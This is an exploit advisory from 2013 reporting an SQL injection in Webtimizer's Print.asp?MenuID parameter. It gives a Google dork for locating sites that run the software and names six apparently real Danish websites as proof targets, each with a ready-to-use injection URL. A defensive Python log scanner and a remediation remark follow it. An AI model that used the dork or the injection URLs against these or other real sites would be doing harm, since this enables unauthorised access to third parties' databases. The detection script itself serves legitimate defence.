#********************************************************************************
# [+] Exploit Title : Webtimizer SQL injection vulnerability
#********************************************************************************
# [+] Software link : http://webtimiser.dk
#********************************************************************************
# [+] Exploit Author : Ashiyane Digital Security Team
#********************************************************************************
# [+] Tested on: Windows 7 , Linux
#********************************************************************************
# [+] Google Dork : intext:"Powered by Webtimizer"
#********************************************************************************
# [+] Date: 2013/09/01
#********************************************************************************
--------------------------------------------------------------------
# [+] Exploit :
#
# [+] Location : [Target]/Print.asp?MenuID=[Sql Injection]
#
#-------
# Proof:
#-------
#
# http://www.kunstkonservering.dk/Print.asp?MenuID=1'
#
# http://www.danacolor.dk/Print.asp?MenuID=1'
#
# http://www.d-e-b.dk/Print.asp?MenuID=1'
#
# http://www.ditcon.dk/Print.asp?MenuID=1'
#
# http://www.freserammer.dk/Print.asp?MenuID=1'
#
# http://www.handymanonline.dk/Print.asp?MenuID=1'
#
#
###################### discovered by : ACC3SS ######################
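
For site operators checking whether the Print.asp?MenuID parameter described above has been probed, the following is an added example and not part of the original advisory. It assumes IIS W3C extended logs with a `#Fields:` header and that MenuID is meant to be a plain integer; the log lines are constructed sample data.

```python
# Added example: flag Print.asp requests whose MenuID is not a plain integer.
# Assumptions: IIS W3C extended log format; MenuID is a numeric identifier.
from urllib.parse import parse_qs

# Constructed sample log (not real traffic; IPs are documentation ranges).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2013-09-01 10:00:01 GET /Print.asp MenuID=1 192.0.2.10 200
2013-09-01 10:00:07 GET /Print.asp MenuID=1' 198.51.100.7 500
2013-09-01 10:00:09 GET /print.asp menuid=1%27 198.51.100.7 500
2013-09-01 10:00:12 GET /Default.asp MenuID=abc 192.0.2.10 200
2013-09-01 10:00:15 GET /Print.asp - 192.0.2.11 200
"""

def suspicious_menuid_requests(log_text):
    """Return (date, time, client_ip, decoded MenuID, status) for each
    Print.asp request whose MenuID value is not purely ASCII digits."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows below
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith("/print.asp"):
            continue
        query = row.get("cs-uri-query", "-")
        if query == "-":                   # IIS logs "-" for an empty query
            continue
        # parse_qs URL-decodes values; ASP parameter names are
        # case-insensitive, so normalise the keys before lookup.
        params = {k.lower(): v for k, v in
                  parse_qs(query, keep_blank_values=True).items()}
        for value in params.get("menuid", []):
            if not (value.isascii() and value.isdigit()):
                hits.append((row["date"], row["time"], row["c-ip"],
                             value, row["sc-status"]))
    return hits

if __name__ == "__main__":
    for hit in suspicious_menuid_requests(SAMPLE_LOG):
        print(hit)
```

Hits paired with a 500 status suggest the quote reached the database layer unescaped; the durable fix is to validate MenuID as an integer and bind it as a query parameter in Print.asp.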